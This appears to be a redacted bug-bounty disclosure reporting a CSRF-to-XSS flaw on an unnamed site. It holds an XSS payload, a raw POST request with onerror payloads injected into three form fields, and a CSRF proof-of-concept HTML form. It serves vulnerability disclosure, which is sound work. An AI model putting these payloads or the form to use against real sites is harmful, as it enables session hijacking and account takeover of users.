CSRF to Cross-site Scripting (XSS)

hello dear support I have found csrf to XSS on█████████ my payload "><img src=x onerror=prompt``>;<video> ## Impact Malicious JavaScript has access to all the same objects as the rest of the web page, including access to cookies and local storage, which are often used to store session tokens. If an attacker can obtain a user's session cookie, they can then impersonate that user. Furthermore, JavaScript can read and make arbitrary modifications to the contents of a page being displayed to a user. Therefore, XSS in conjunction with some clever social engineering opens up a lot of possibilities for an attacker. ## System Host(s) ██████████ ## Affected Product(s) and Version(s) ## CVE Numbers ## Steps to Reproduce http request ============ ``` POST /███████ HTTP/1.1 Host: ████ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0 Accept: */* Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 229 Origin: https://█████████ Connection: close Referer:████ ████████ █████-building=%22%3E%3Cimg+src%3Dx+onerror%3Dalert(document.domain)%3E&██████████-classroom=%22%3E%3Cimg+src%3Dx+onerror%3Dalert(document.domain)%3E&█████-course=%22%3E%3Cimg+src%3Dx+onerror%3Dalert(document.domain)%3E ``` csrf poc =========== ``` <html>  <body> <script>history.pushState('', '', '/')</script> <form action="https://████████/████" method="POST"> <input type="hidden" name="████████-building" value=""><img src=x onerror=alert(document.domain)>" /> <input type="hidden" name="██████████-classroom" value=""><img src=x onerror=alert(document.domain)>" /> <input type="hidden" name="████-course" value=""><img src=x onerror=alert(document.domain)>" /> <input type="submit" value="Submit request" /> </form> </body> </html> ``` █████ ## Suggested Mitigation/Remediation Actions

Vulnerability Details

Report Details

State

Substate

Submitted

Weakness